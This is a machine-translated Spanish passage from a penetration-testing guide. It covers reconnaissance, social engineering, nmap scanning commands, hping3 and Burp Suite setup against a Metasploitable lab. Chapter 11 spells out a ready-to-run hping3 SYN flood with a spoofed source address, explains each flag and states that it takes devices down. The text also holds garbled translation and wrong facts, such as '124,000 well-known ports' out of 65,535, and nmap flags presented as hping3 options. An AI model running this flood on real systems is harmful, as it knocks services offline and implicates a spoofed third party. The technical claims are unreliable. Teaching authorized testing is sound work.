Machine Translated by Google

cifrado que están utilizando y otros servicios que podrían utilizarse junto con su entorno de
correo electrónico.

También puede averiguar cómo alojan los servidores de correo electrónico o qué proveedores
de alojamiento utilizan. A continuación, puede hacer algo de inteligencia competitiva.

La inteligencia competitiva es la forma que la mayoría de las empresas utilizan para conocer a
sus competidores. Los atacantes pueden usar estos mismos recursos para averiguar qué está
haciendo la gente, y también es una excelente manera para que las empresas descubran en
qué proyectos están trabajando actualmente sus competidores.

A continuación, debe realizar un reconocimiento "whois", para que pueda averiguar quién posee
el rango de direcciones IP o su dominio. Para lograr esto, puede utilizar herramientas como
Domain Dossier o SmartWhois.

A veces, estas herramientas también harán una enumeración necesaria basada en DNS, que
es su próximo paso. Para el reconocimiento de DNS, puede usar herramientas como Sam
Spade o DNSstuff, pero siempre usa el comando "nslookup", que es muy poderoso.

Una de las razones por las que debe realizar un reconocimiento de DNS es porque puede
determinar hosts clave en la red que luego puede usar para realizar ataques de ingeniería social
o podría usar durante un ataque de envenenamiento de DNS.

Su próximo paso es realizar un reconocimiento de la red. Para este propósito, debe usar tipos
de herramientas, como "Path Analyzer Pro", que le mostrará la ruta que toma un paquete, o la
herramienta Network Pinger o VisualRoute que le permite obtener más información sobre la red
objetivo.

Estos le ayudarán a dibujar un mejor diagrama de lo que está tratando.


También debe probar algún ataque de ingeniería social que incluya "navegar por el hombro"
para ver si puede recopilar información observando lo que hace la gente.

Otros ataques de ingeniería social también incluyen el buceo en basureros o el espionaje. Estos
le permitirán recopilar información, como los productos de seguridad de la organización que
están utilizando, los sistemas operativos, las versiones de software, el diseño de la red, las
direcciones IP o los nombres de sus servidores.

Debe asegurarse de documentar todo lo que encuentre. Esto se debe a que tendrá que usar
este documento y toda la información que tiene
Machine Translated by Google

recopilados para comprender y analizar la postura de seguridad de su objetivo.


Se sorprenderá con la información que puede sacar de lo que obtiene con este método.
Por eso es tan importante pasar el mayor tiempo posible aquí, para que pueda crear
un mapa de todo lo demás que está a punto de hacer.
Machine Translated by Google

Capítulo 10 Detección de hosts con exploración de puertos

Cuando se trata de escanear su dispositivo de destino, debe averiguar qué sistemas están
activos en la red y con qué frecuencia están activos en la red.

Además, ¿solo están despiertos durante ciertos horarios? También tendrá que descubrir los
puertos que están actualmente abiertos en estos nodos y los servicios que se están
ejecutando.

Cada una de estas cosas lo ayudará a determinar si existe alguna vulnerabilidad que pueda
perseguir en su dispositivo de destino. Otra forma de escanear la red es descubrir si hay
algún banner que pueda captar.

Al realizar este proceso, aprenderá qué puertos desea cerrar y, si hay banners, puede
ocultarlos o personalizarlos. También deberá ver qué servicios no desea y, si no los desea,
debe desactivarlos.

Esto también podría brindarle una comprensión de cómo puede estandarizar su firewall y las
reglas del sistema de detección de intrusos, y también verá el vector de configuración
incorrecta y lo que desea hacer para corregir esas configuraciones incorrectas.

Una vez que comience el proceso de escaneo, debe ejecutar un descubrimiento de host,
que detectará los hosts que están activos en la red de destino. Existen numerosas
herramientas que podría usar, y algunas de ellas están basadas en GUI, mientras que otras
están basadas en la línea de comandos.

Por ejemplo, la herramienta llamada "Nmap" analiza el entorno basado en DOS o solo en el
símbolo del sistema. Nmap también tiene una versión GUI que se llama Zen Map. También
existen otras herramientas, pero estas son las más populares.

Estas herramientas no están destinadas a engañar; pero puedes usarlos de esa manera
también. Una vez que reunió una lista de nodos que están activos en la red, su próximo
objetivo es realizar un escaneo de puertos.

Al ejecutar un escaneo de puertos, sabrá qué puertos están abiertos. A través de esos
puertos, un atacante puede instalar malware en un sistema o aprovechar vulnerabilidades
específicas.

Por lo tanto, siempre debe verificar qué puertos están abiertos e incluirlos en su informe si
no es necesario que estén abiertos. Algunas herramientas que puedes usar son
Machine Translated by Google

“nmap” del que ya hablé, pero hay que entender que algunas de estas herramientas son
herramientas multipropósito.

Otra herramienta que puede utilizar se llama "NetScanTools Pro". Es posible que tenga otras
herramientas que prefiera, pero debe elegir una y dominarla. Mientras tanto, también es bueno
tener exposición a otras herramientas, y no es solo por su experiencia o para poner en su CV,
sino también por otras razones.

Por ejemplo, cuando comience a usar estas herramientas, se dará cuenta de que cada uno
de estos programas tiene ciertas limitaciones, y mientras uno de ellos hace un trabajo, el otro
puede ayudarlo a hacer mejor otro trabajo.

Le recomiendo que se concentre en “Nmap” para su futuro inmediato, así como para su
mundo real. Nmap es una herramienta muy útil y flexible, pero cuando se trata de esta
industria, a la mayoría de los hackers éticos o profesionales de pruebas de penetración les encanta.

El siguiente paso es una captura de banner. A veces, las personas se refieren a ella como
una huella digital del sistema operativo. Al hacer una captura de banner, puede enviar
comandos individuales a un sistema y responde de una manera específica, y sabemos que
los dispositivos Windows reaccionan de cierta manera, al igual que los dispositivos Linux.

Todos y cada uno de los sistemas operativos responden con un enfoque diferente a los
mismos comandos y las Mac también hacen lo mismo. Estas respuestas identifican el sistema
operativo, lo que le permite encontrar y explotar la vulnerabilidad relacionada con ese sistema
operativo.

Las herramientas que puede utilizar para capturar banners incluyen dispositivos como "Telnet
o SSH". A continuación, puede comenzar a buscar vulnerabilidades. Escaneando la red en
busca de vulnerabilidades, puede utilizar herramientas específicas, pero puede tener sus
propias preferencias, así que permítame darle una descripción general.

Algunas de las mejores herramientas que puede usar para escanear la red en busca de
vulnerabilidades son "Core Impact Professional" o "Retina". Microsoft también fabrica uno que
se llama MBSA, también conocido como Microsoft Baseline Security Analyzer, o GFI LanGuard.

Su propósito es determinar la debilidad o las lagunas de seguridad de esos dispositivos de


destino. En resumen, ya entendió que es un dispositivo de Microsoft o un servidor Apache,
por lo tanto, su próximo paso es averiguar qué vulnerabilidades puede arrojarle.

Estas herramientas lo ayudarán a ver qué vulnerabilidades funcionarían. Por esto


Machine Translated by Google

Punto, tendrá mucha información, y esto va junto con la documentación, pero también debe
dibujar la red.

Esto lo ayudará a comprender la conexión y la ruta entre los nodos de la red, y existen
numerosas herramientas que puede usar para dibujar un diagrama de red fácilmente.

Para este propósito, una de las mejores herramientas que puede usar se llama "SolarWinds" y
"Administrador de topología de red". Algunas de estas herramientas son gratuitas, mientras que
otras son productos de pago.

La mayoría de las empresas utilizan "SolarWinds", que puede utilizar para diversos fines. Con
SolarWinds, puede dibujar mapas de red, puede enviar comandos a varios dispositivos en
tiempo real o, si lo prefiere o lo requiere, puede programar la fecha y la hora de las
implementaciones de comandos.

Puede utilizar SolarWinds para fines de gestión de IP, así como para alertar sobre interrupciones
de la red o tiempos de inactividad de la interfaz, etc. SolarWinds tiene un costo, pero es un gran
software y las empresas lo utilizan para numerosos propósitos.

Su objetivo es obtener una representación visual para comprender mejor qué es, dónde y cómo
están conectados. Una vez que conoce los objetivos porque los identificó por completo y sus
vulnerabilidades, y ha elaborado la topología de la red, el siguiente paso durante su prueba de
penetración es activar sus proxies.

El proxy está diseñado para ocultar servidores para que el cliente o cliente no pueda determinar
de dónde proviene el ataque. Podrías activar ambos proxies; internamente y externamente.

Una de las mejores herramientas que puede usar para proxies se llama "Proxy Workbench".
Proxy Workbench tiene una interfaz GUI que utiliza la red TOR. Otro producto para Mac OS se
llama “proxifier”.

Una vez que comience a ejecutar su proxy deseado, obtendrá una lista de direcciones IP y
podrá seleccionar cuántas debe usar. Algunos de estos proxies son servicios gratuitos, y si
busca en Google "proxies gratuitos", puede crear una cadena de proxy en muy poco tiempo.
Cualquiera que sea el proxy que usará, también debe documentarlo.

La documentación es el paso más importante en las pruebas de penetración porque le ayuda a


conservar todos los resultados de las pruebas que ha realizado. también
Machine Translated by Google

ayudarlo a encontrar vulnerabilidades potenciales en la red, para que pueda recomendar algunas
contramedidas.

Al mismo tiempo, también desea mostrarle a su cliente cómo pudo lograr lo que hizo. Esta es
también la mejor manera de legitimar lo que hiciste y lo que un atacante podría hacerles.

Una vez que haya encontrado sus objetivos, el siguiente paso es la enumeración. Mediante la
enumeración, el atacante puede recopilar tanta información como pueda sobre el dispositivo de
destino.

Algunos informes que puede sacar de estos sistemas deben incluir grupos de identidad, cuentas
de usuario y cuentas de servicio porque nadie mira esas cosas.

También puede determinar los recursos de red y sus recursos compartidos de red u otros
hallazgos que se comparten desde esa máquina. En muchos casos, también puede enumerar
las aplicaciones que están instaladas en esos dispositivos.

El paso de enumeración se basa en los datos que recopila de la etapa de reconocimiento, pero
también debe considerar enumerar los dispositivos de red.

Los dispositivos de red incluyen; enrutadores, conmutadores, sistemas de detección de intrusos,


sistemas de prevención de intrusos, cortafuegos, motores de servicios de identidad, controladores
de LAN inalámbrica, etc.

Usted, como evaluador de penetración, debe realizar numerosos tipos diferentes de métodos de
enumeración para asegurarse de obtener toda la información que pueda de cada máquina visible
en la red de destino.

La razón por la que debe hacer esto es para determinar las debilidades y vulnerabilidades de la
red de la organización. El propósito principal es tratar de identificar las brechas de la infraestructura
de la red.

Puede comenzar los pasos de enumeración encontrando el rango de red de la empresa o los
objetivos, y puede hacerlo con un comando "whois" para buscar dispositivos, de modo que pueda
ver qué rangos se les han asignado en el lado público.

Aquí es donde se encuentran los servidores más importantes porque generalmente es la cara de
la empresa, y eso es brindar un servicio, donde las personas inician sesión u obtienen información
sobre la empresa.
Machine Translated by Google

Una vez que tenga ese rango de IP, querrá calcular la máscara de subred, lo que
puede ayudarlo a reducir sus barridos de ping. Esto también lo ayudaría con el escaneo
de puertos.
Una vez que haya calculado la máscara de subred, el siguiente paso es descubrir los
hosts que están disponibles públicamente en Internet. Una vez más, la primera
recomendación es utilizar software como “nmap”.
Puede seguir adelante y usar otro software, pero pueden ser más detectables. Por
ejemplo, "escáner de IP enojado" es extremadamente fácil de detectar, pero con
"nmap", estará bien, especialmente si está mapeando solo una vez por minuto, por lo
que no parecerá un barrido de ping.
Una vez que haya descubierto los hosts, debe ir tras los puertos. Desea poder ver qué
puertos están abiertos, cuáles están cerrados y qué puertos solo permiten el paso de
tráfico específico.

Esto le brinda un mejor diseño de la política de seguridad en esas máquinas. Una de


las herramientas más populares que puedes usar para este propósito es: (lo has
adivinado bien) “nmap”.
Una vez que haya realizado el escaneo de puertos, tiene otros métodos de enumeración
que puede usar para obtener una mejor imagen. Uno de ellos se llama "enumeración
NetBIOS".

Cuando realiza una enumeración de NetBIOS, la utiliza para identificar dispositivos de


red y obtener una lista de equipos que pueden estar en el dominio. También puede ver
una lista de carpetas compartidas, pero en algunos casos, incluso contraseñas.
Para la enumeración de NetBIOS, también puede usar "WinFingerprint" o "SuperScan".
Si realiza una enumeración de NetBIOS, no solo cada máquina responderá a estos
tipos de enumeración, sino que también debe intentar construir su mapa.

Al implementar diferentes tipos de métodos de enumeración, puede completar los


espacios en blanco con una "enumeración SNMP". SNMP o Protocolo simple de
administración de red es un protocolo que puede usar para administrar sus dispositivos
de red.

Si el SNMP está configurado incorrectamente, puede hacer que esos dispositivos de


red se identifiquen y proporcionen información útil, como cuentas de usuario, versiones
de IOS que están ejecutando, su tiempo de actividad y las direcciones IP que utilizan.
Machine Translated by Google

están asignados a.

Una de las mejores herramientas que puede usar para la enumeración SNMP incluye
SolarWinds y el "conjunto de herramientas de monitoreo de red OpUtils". Debido a que SNMP
no siempre se usa en máquinas de red como enrutadores y conmutadores, puede instalar
SNMP en servidores para administrar esos dispositivos o para recibir una notificación cuando
algo sucede.

Si aún no has dibujado tu mapa, debes hacerlo con una enumeración LDAP. LDAP es parte de
Active Directory, pero también hay otros productos que admiten el entorno LDAP.

LDAP es una base de datos donde se almacena la información del usuario, como su nombre,
apellido, información personal, hora y fechas en las que pueden iniciar sesión, desde dónde
pueden iniciar sesión, en qué departamentos trabajan, etc. en.

La enumeración LDAP es excelente porque puede hacer otras cosas en función de la


información que puede descubrir, incluidos los ataques de ingeniería social. La mejor
herramienta que puede usar aquí se llama "Administrador LDAP Softerra".

Una vez que haya realizado su enumeración LDAP, otro método que puede usar se llama
"enumeración NTP". Las pruebas de penetración externas prueban la seguridad que rodea los
sistemas conectados externamente desde Internet.

Las pruebas controladas se utilizan para obtener acceso a los recursos de Internet y, en última
instancia, a la "DMZ", que es una red interna que atraviesa y rodea los firewalls de Internet.

Las pruebas de penetración externas también implican la búsqueda y explotación de


vulnerabilidades reales conocidas y desconocidas desde la perspectiva de un atacante externo.

¿Cómo va a ejecutar la tarea de prueba de penetración externa? Bueno, una vez que le pidió
a su cliente información sobre su infraestructura, debe dibujar un diagrama visual que represente
la infraestructura de la organización del cliente.

Los dibujos deben incluir ambos; las partes físicas y las personas asociadas con ese artículo,
si es posible. Su mapa de red también debe incluir rangos de IP que el cliente ya le haya dado.

Opcionalmente, se podría agregar el proveedor de servicios de Internet o ISP para mayor


claridad. Usando Kali Linux, lo primero que hará es mapear la ruta hacia el objetivo.
Machine Translated by Google

A continuación, ejecutará un barrido de ping en su red de destino. O mejor, le pedirá a su red


de destino que busque hosts en vivo y, una vez más, utilizará "nmap" para realizar múltiples
técnicas de escaneo de puertos contra su objetivo.

El "mapeo de rutas" se usó originalmente como una herramienta de diagnóstico que le permite
ver la ruta que sigue un paquete IP de un host al siguiente. Usando el campo "TTL" o "Tiempo
de vida" en un paquete, cada salto de un punto al siguiente provoca un mensaje de tiempo
excedido "ICMP". ICMP significa Protocolo de mensajes de control de Internet.

Los paquetes cuentan el número de hosts y la ruta tomada. Por ejemplo, el host de origen es
su Kali Linux, y el servidor de Google está conectado por dos enrutadores intermedios, que
llamaré "R1" y "R2".

Primero, el nodo Kali enviará una sonda TTL 1 al enrutador R1. Luego, R1 lo recogerá y enviará
una respuesta con el tiempo excedido.

A continuación, el host de Kali enviará una sonda TTL 2 a R1, donde R1 la toma y la reduce en
uno, y luego la envía a R2. R2 lo recogerá y devolverá un paquete con tiempo excedido.

Finalmente, el nodo Kali enviará una sonda TTL 3 a R1. R1 lo recogerá, lo disminuirá en uno y
luego lo enviará a R2. Después de eso, R2 lo recogerá, lo disminuirá en uno y lo enviará al
servidor de Google.

Cuando el servidor de Google lo recoge, envía una respuesta con el puerto de destino
inalcanzable. ¿Por qué? Porque la mayoría de las veces, los servidores bloquean los paquetes
para este tipo de puerto.

En Kali Linux, “traceroute” es un programa de línea de comandos que usa paquetes ICMP para
mapear la ruta. Para rastrear la ruta al servidor de Google, escriba "traceroute www.google.com"

y debería ver que tomó entre 12 y 16 saltos para llegar al servidor de Google. Si lo intenta una

vez más, pero esta vez ejecútelo usando "nmap", obtendrá un resultado un poco diferente. ¿Por
qué?

Bueno, "nmap" le permite hacer exactamente lo mismo, pero en su lugar utiliza el protocolo
TCP, que es permitido por casi todos los cortafuegos.

Para darle una idea acerca de algunos ejemplos básicos de escaneo de Nmap que se usan a
menudo en la primera etapa de la enumeración, consulte los siguientes comandos:
Machine Translated by Google

“nmap -sP 10.0.0.0/24“ Ping

escanea la red, enumerando las máquinas que responden al ping.

"nmap -p 1-65535 -sV -sS -T4 target" Escaneo

completo de puertos TCP con detección de versión de servicio: generalmente mi primer escaneo, encuentro
que T4 es más preciso que T5 y aún "muy rápido".

“nmap -v -sS -A -T4 target” Imprime

una salida detallada, ejecuta un escaneo de sincronización oculto, temporización T4, detección de versión y
sistema operativo y proporciona traceroute y scripts contra los servicios de destino.

“nmap -v -sS -A -T5 target” Imprime

una salida detallada, ejecuta un escaneo de sincronización sigiloso, temporización T5, detección de versión y
sistema operativo y proporciona traceroute y scripts contra los servicios de destino.

"nmap -v -sV -O -sS -T5 target" Imprime una

salida detallada, ejecuta un escaneo de sincronización sigiloso, temporización T5 y proporciona detección de


versión y sistema operativo.

"nmap -v -p 1-65535 -sV -O -sS -T4 objetivo"

Imprime resultados detallados, ejecuta escaneo de sincronización sigiloso, temporización T4, detección de versión y
sistema operativo y proporciona escaneo de rango completo de puertos.

"nmap -v -p 1-65535 -sV -O -sS -T5 objetivo"

Imprime resultados detallados, ejecuta escaneo de sincronización sigiloso, temporización T5, detección de versión y
sistema operativo y proporciona escaneo de rango completo de puertos.

Cada vez que vea tres puntos en la salida de la línea de comandos, significa que los paquetes están
bloqueados. La razón de esto podría ser un firewall como Checkpoint o Cisco ASA Firewalls que descartan
este tipo de paquetes de forma predeterminada.

El escaneo de puertos con "nmap" es el proceso de conexión a puertos TCP y UDP para determinar qué
servicios y aplicaciones se están ejecutando en el objetivo
Machine Translated by Google

sistema.

Hay 65, 535 puertos para TCP y UDP en cada computadora. Se sabe que algunos puertos
están asociados con servicios particulares, por ejemplo, el puerto TCP 21 es conocido por el
servicio FTP.

Los primeros 124 000 puertos también se conocen como "puertos bien conocidos" y son
utilizados por la mayoría de los servicios definidos. Siempre que hable sobre el escaneo de
puertos, "nmap" debería venir a su mente.

Nmap es una herramienta de mapeo de puertos universal y el mapeo se basa en la huella


digital de la pila activa. Los paquetes especialmente diseñados se envían al sistema de destino
y la respuesta del sistema operativo a esos paquetes permite que un mapa identifique el
sistema operativo.

Para que "nmap" funcione, al menos un puerto de escucha debe estar abierto y el sistema
operativo debe ser conocido y con huellas dactilares. Podríamos pasarnos todo el libro hablando
de “nmap”, y si nunca lo has usado antes, te recomiendo que le eches un vistazo.

También hay otros recursos sobre el descubrimiento básico de host en términos de solicitudes
de eco ICMP y respuestas de eco, así como consultas relacionadas con DNS y cómo se
resuelven los nombres de host.

Cuando se trata de cortafuegos, hay tipos "con estado" y "sin estado". Bueno, también hay
cortafuegos basados en zonas, cortafuegos basados en políticas y muchos más, pero en
resumen; los firewalls con estado permiten el tráfico entrante si se inició desde la red interna
proveniente de una red externa.

Los cortafuegos sin estado, por otro lado, son cortafuegos que descartan paquetes entrantes
incluso si el tráfico se inició desde el interior; a menos que se haya implementado previamente
una regla de "aceptación" de firewall que permita el tráfico desde un origen específico a un
destino específico en un número de puerto específico.

Nmap utiliza la función de "trazado de ruta" para identificar su camino hacia el servidor que ha
elegido como su destino. Una vez que haya identificado algunas direcciones IP con nmap,
también puede usar el comando "traceroute" para determinar qué saltos hay en el camino entre
usted y los dispositivos finales que ha identificado.

Una vez que se completa el "trazado de ruta", el primer paso es ejecutar un barrido de ping de
red contra un espacio de direcciones IP de destino y buscar respuestas que indiquen que un
Machine Translated by Google

el objetivo en particular está vivo. Tradicionalmente, hacer ping se refería al uso de paquetes
“ICMP”.

Sin embargo, el tráfico TCP, UDP, ICMP y ARP también se puede utilizar para identificar hosts
activos. Hay varios escáneres que se pueden usar para ejecutar desde ubicaciones remotas a
través de Internet para identificar hosts en vivo.

Si bien la herramienta principal del escáner es "nmap", Kali proporciona varias otras
aplicaciones que son útiles, como "hping3".

“Hping3” es una de las herramientas más útiles debido al control que brinda sobre los tipos de
paquetes, el paquete de origen y el paquete de destino. Por ejemplo, si desea hacer ping al
servidor de Google, bueno, si Google no permite las solicitudes de ping ICMP, entonces podría
ser posible hacer ping al servidor de Google utilizando la solicitud de envío TCP.

Por ejemplo, puede hacer ping a google.com desde la línea de comando, usando el comando
ping con el argumento "-c", que establecerá un conteo de envío de tres paquetes al servidor
de Google.

Si ve una pérdida de paquetes del 100 %, significa que Google está bloqueando los comandos
de ping basados en paquetes ICMP. Esto no debería detenerlo en absoluto, porque tiene
instaladas las herramientas más poderosas en Kali, que es "hping3".

El comando que debe usar es el mismo, pero en lugar de escribir ping, solo escriba "hping3"
seguido de la dirección de destino.

Puede crear varias variaciones de la herramienta "hping3" que también descubrirá hosts en
vivo y todo el mapa utilizando respuestas ICMP y paquetes enviados por TCP en los puertos
80 y 443 al mismo tiempo.

Puede usar argumentos junto con el comando, como "-t", que representa el tiempo, seguido
de un número entre 1 y 5, donde 1 es el más lento y 5 el más rápido.

Luego, el indicador "-sn" se usa para el descubrimiento de hosts, seguido de la opción "-v",
que se usa para verbose perfect. En breve, veremos un ejemplo específico del uso de hping3,
pero antes de eso, resumiremos NTP SMTP y DNS.

NTP significa Network Time Protocol, que es el reloj o el protocolo de sincronización de tiempo.
Desafortunadamente, NTP a veces le permite consultar
Machine Translated by Google

servidores que actúan como sincronización de tiempo para obtener más información, como una lista
de pares y algunas otras estadísticas que a menudo son consultadas por las personas.

Hay un software llamado "Utilidad de huellas dactilares NTP", que le permite identificar el sistema
operativo en el que se ejecuta el servidor NTP. A continuación, debe intentar probar la enumeración
SMTP.

SMTP significa Protocolo simple de transferencia de correo, que se utiliza para correos electrónicos
y servidores de correo electrónico. Puede usar un script de Perl llamado "enumeración SMTP" y
numerosos conmutadores con nmap para exponer direcciones de correo electrónico legítimas, que
podrían incluir nombres de usuario de usuarios finales.

El software llamado "Metasploit" también podría ayudarlo a enumerar los correos electrónicos de los
usuarios utilizando el protocolo SMTP. Una vez que haya probado la enumeración SMTP y la
enumeración LDAP, también existe el servicio llamado DNS.

DNS es su servicio de nombres de dominio, que es un servicio que realiza un seguimiento de los
nombres de dominio a sus direcciones IP. Hay muchas herramientas que puede usar para la
enumeración de DNS, incluidas "BioSuite", "Nmap" o "Búsqueda de DNS de TX". También asegúrese
de recordar el comando "nslookup".

Ahora que tiene un montón de información que ha recopilado, debe actualizar su documentación. De
hecho, su documentación debe actualizarse casi en cada paso del camino.

También debe usar su documentación a medida que la crea, de modo que pueda analizar los
resultados y sugerir algunas contramedidas al cliente para mejorar su seguridad. Solo recuerde que
el objetivo es asegurarse de proteger al cliente y brindarle comentarios.

Tenga en cuenta que el resto de este libro se centrará en ejemplos concretos de cómo se pueden
implementar los ataques.
Machine Translated by Google

Capítulo 11 Detección de dispositivos con Hping3

Para descubrir dispositivos de red, ya sean locales o remotos, y que no respondan


directamente a la solicitud de ping de ICMP, aún podemos verificar que existen utilizando
las opciones de TCP y UDP. Hping3 tiene todas esas opciones y mucho
más.

Si no tiene respuesta de un dispositivo que está seguro de que existe, es posible que el
firewall se haya configurado para no permitir solicitudes de ping a fin de eliminar los ataques
de denegación de servicio, y eso es comprensible, pero aún desea verificar ese dispositivo. .

Las grandes organizaciones deshabilitan las respuestas de ping filtrándolas en sus firewalls.
Sin embargo, si aún queremos validar que el dispositivo al que intentamos hacer ping está
activo, podemos usar muchas otras herramientas que ya discutimos, como nmap y ZenMAP.

Hping3 reemplazó la versión anterior conocida como ping2 y ahora tiene funciones
adicionales además del ping ICMP, tales como: ÿ Solicitud de ping con TCP, ÿ Solicitud de

ping con UDP, ÿ Fingerprinting, ÿ Herramienta Sniffer y Spoofer, ÿ Escaneo avanzado


de puertos, ÿ Prueba de firewall , ÿ Medición remota del tiempo de actividad, ÿ TCP/IP,
también conocido como auditoría de pila de modelos OSI, ÿ Herramienta de inundación
avanzada, ÿ Creaciones de canales encubiertos, ÿ Propósitos de transferencia de
archivos y más.

Hping3 es una excelente herramienta de descubrimiento de dispositivos y está integrado en


Kali Linux de forma predeterminada. Hping3 está operando en una interfaz de línea de
comandos y tiene muchas funciones. Para listar esas funcionalidades, escriba: “hping3 – h”

y presione enter. Aquí, h significa ayuda, por lo tanto, se le proporcionará la salida de

posibilidades usando hping3.


Machine Translated by Google

Con Hping3, puede especificar hacer ping no solo a una dirección, sino a cientos
de direcciones al mismo tiempo, y puede manipular su propia dirección IP de origen
para que se parezca a cualquier otra dirección IP que desee.
Además, puede manipular su interfaz de origen desde donde se originó el ping.
Por lo tanto, es casi imposible rastrearlo hasta su origen.
fuente.

No entraré en todas las posibilidades que puede hacer con Hping3, pero
mencionaré que es muy fácil crear un ataque de denegación de servicio.
Para establecer una conexión entre dos dispositivos de red, debe haber un
protocolo de enlace TCP de 3 vías y su primer paso debe ser una solicitud SYN.
SYN significa Sincronización.

Lo que podemos iniciar es una solicitud SYN continua a un dispositivo que se


inundaría de solicitudes y eventualmente la CPU de la PC de la víctima o cualquier otra.
Machine Translated by Google

dispositivo de red ya no sería capaz de manejarlo y eventualmente se apagaría. Un ejemplo


del comando se vería así:

“hping3 –S 10.10.10.20 –a 192.168.1.20 22 –inundación”

-S > Esto representa la solicitud SYN.

10.10.10.20 > Esta IP representa la dirección IP de la víctima.

-a > Esto representa que la siguiente dirección que especificaré será la


fuente.

192.168.1.20 > Esta es la dirección de origen falsa en lugar de proporcionar mi propia


dirección, por lo tanto, esta dirección también será una víctima, o podemos llamarla la
segunda víctima, porque la primera víctima intentará responder a las solicitudes SYN a esta
IP. habla a.

22 > Esto representa el número de puerto "ssh", pero puede especificar cualquier puerto que
se haya identificado como puerto abierto con herramientas como nmap.

--flood > Esto significa que le estoy diciendo a Kali Linux que envíe las solicitudes SYN lo
más rápido posible.

Usar este conjunto de comandos no es una broma. Puede dañar seriamente la CPU de
cualquier dispositivo si ejecuta dicho comando incluso durante unos segundos. Si elige
dejarlo funcionar durante minutos, le prometo que muchos dispositivos probablemente se
rendirán y se apagarán.

Esta es también la razón por la que le advierto que se asegure de tener una autorización por
escrito antes de usar este comando en un entorno de producción.
Además de eso, incluso si desea practicar en el entorno de su laboratorio doméstico, no deje
que se ejecute durante más de unos segundos, ya que puede causar daños muy graves a
sus propios dispositivos de red.
Machine Translated by Google

Capítulo 12 Configuración del proxy de Burp Suite

Burp proxy es un componente crucial de toda la aplicación Burp Suite. Burp proxy es otra herramienta
que puede usar que le permite interceptar el tráfico web entre el navegador y la aplicación de destino,
que es el propio servidor web.

Para iniciar Burp Suite, vaya al menú de la aplicación, luego seleccione el elemento Kali Linux, seguido
de las 10 mejores herramientas de seguridad, y luego seleccione Burp Suite de la lista.

Burp Suite es la versión gratuita dentro de Kali por defecto, pero también puedes usar la versión
profesional y tendrás acceso a todas las funcionalidades de esta aplicación.

La versión gratuita es un buen punto de partida si quieres aprender cómo funciona esta aplicación. Una
vez que tenga Burp en funcionamiento, querrá asegurarse de que su proxy esté habilitado y escuchando
en el puerto 8080.

Vaya a la pestaña Proxy, seleccione la pestaña Opciones, luego debería ver que el agente de escucha
del proxy se está ejecutando y escuchando en el puerto 8080.

A continuación, debe configurar su navegador para que pueda usar el puerto en el que estaba
escuchando Burp Suite. Puede usar una herramienta de "complemento" llamada "proxy foxy" para
Firefox.

Es una manera fácil de tener múltiples proxies y poder cambiar entre ellos rápidamente. Después de
instalar “foxy proxy”, justo al lado de la barra de URL del navegador, hay un zorro con un círculo y una
línea a lo largo. Haga clic en el zorro y luego haga clic en agregar un "nuevo proxy".

En la pestaña "Detalles del proxy", deberá establecer la configuración manual del proxy en el host local
y el puerto del proxy en 8080. A continuación, haga clic en la pestaña General, asigne un nombre a ese
proxy y finalmente haga clic en el botón Guardar.

Básicamente, lo que ha hecho es decirle a su navegador que envíe todo el tráfico a su host local al
puerto 8080. Este es el puerto en el que configuró la aplicación Burp Suite para escuchar.

Burp sabe que tomará tráfico y lo transmitirá a Internet. Una vez que haya guardado este perfil, haga
clic derecho en el zorro y seleccione su configuración de proxy.
Machine Translated by Google

Para este escenario, puede nombrarlo "Burp proxy", y si tiene que comenzar a
usarlo, todo lo que tiene que hacer es hacer clic en él. Una vez que su
navegador esté usando el proxy, puede navegar a la aplicación web. Si regresa
a Burp, verá el proxy y la luz de la pestaña de intercepción está encendida y
cambia a color naranja.
Si ves que esto sucede, sabes que lo has configurado todo a la perfección.
Debería ver que Burp capturó con éxito la solicitud de obtención del sitio web.
Por defecto, el estado inicial es interceptar todo el tráfico.
Interceptar significa detener cualquier solicitud del navegador a la aplicación
web y le dará la capacidad de leer o modificar esa solicitud. Si intenta navegar
a cualquier sitio con la configuración predeterminada, no podrá ver ninguna
respuesta hasta que desactive el botón de intercepción.
Al hacer clic en el botón de intercepción para desactivarlo, seguirá capturando
todo el tráfico web, pero no manipulará directamente cada solicitud. La
intercepción está activada o desactivada. Además, puede ver todas las
solicitudes y las respuestas en la pestaña Historial.
Machine Translated by Google

Capítulo 13 Configuración de destino para Burp Scanner

Un buen entorno para las pruebas de penetración web es el sitio web mutillidae.com, que ya está
instalado en una máquina "metasploitable". El "metasploitable" es un sistema operativo Linux y
está preconfigurado para realizar pruebas de penetración.

Para descargar una copia del host metasploitable, debe navegar al sitio web del proyecto en
sourceforge.net y descargar una copia de la máquina virtual haciendo clic en el elemento zip de
Linux metasploitable.

Para ver el sitio web mutillidae.com en su navegador, ingrese la dirección IP de su máquina


metasploitable, que en su caso será una dirección privada.
Seguido del nombre de la aplicación web, que es mutilidae.

A continuación, debe habilitar el proxy Burp seleccionándolo en el menú del proxy foxy, que
instaló en el capítulo anterior. Vuelva a cambiar al proxy Burp, haga clic en la pestaña Proxy,
luego en la pestaña Interceptar y luego haga clic en el botón Interceptar para desactivarlo.

No necesita interceptar ninguna solicitud por el momento. A continuación, haga clic en la pestaña
Destino y asegúrese de que la pestaña del mapa del sitio esté seleccionada. Debería ver la URL
de mutilidae que acaba de atrapar y reenviar.

El siguiente paso que debe hacer es agregarlo al alcance. Haga clic derecho en la carpeta
mutilidae y seleccione el elemento "Agregar al alcance". El ámbito define dónde se pueden
realizar análisis y pruebas automatizados, y le ayuda a no analizar de forma activa los dominios
que están fuera de su ámbito.

Los escáneres de vulnerabilidades son herramientas automatizadas que rastrean una aplicación
para identificar las firmas de vulnerabilidades conocidas. Los escáneres de vulnerabilidades son
ruidosos y, por lo general, los detecta la víctima.

Sin embargo, los escaneos con frecuencia se ignoran como parte de un sondeo regular en
segundo plano en Internet. Burp Scanner es un escáner de aplicación web dinámico incluido en
la adición profesional del software Burp Suite.

La herramienta le permite escanear automáticamente sitios web y detectar fallas de seguridad


comunes, que incluyen inyección de SQL, secuencias de comandos entre sitios, inyección de
XML, indicadores de cookies faltantes y mucho más.

En este capítulo, le explicaré cómo usar Burp Suite para lograr un


Machine Translated by Google

escaneo completo completo. Una vez más, utilizará el sitio web mutillidae.com para lograr su objetivo.
Consulte el capítulo anterior para comprender los conceptos básicos de cómo usar Burp Suite antes de
continuar.

Una vez que esté listo, haga clic en el ícono de proxy foxy para habilitar el proxy de Burp Suite y
seleccione su proxy de la lista. Actualice la página y vuelva a Burp Suite. Seleccione la pestaña Proxy,
luego la pestaña Intercept y apague la intercepción.

De manera predeterminada, el escáner Burp está configurado para realizar un escaneo pasivo en todos
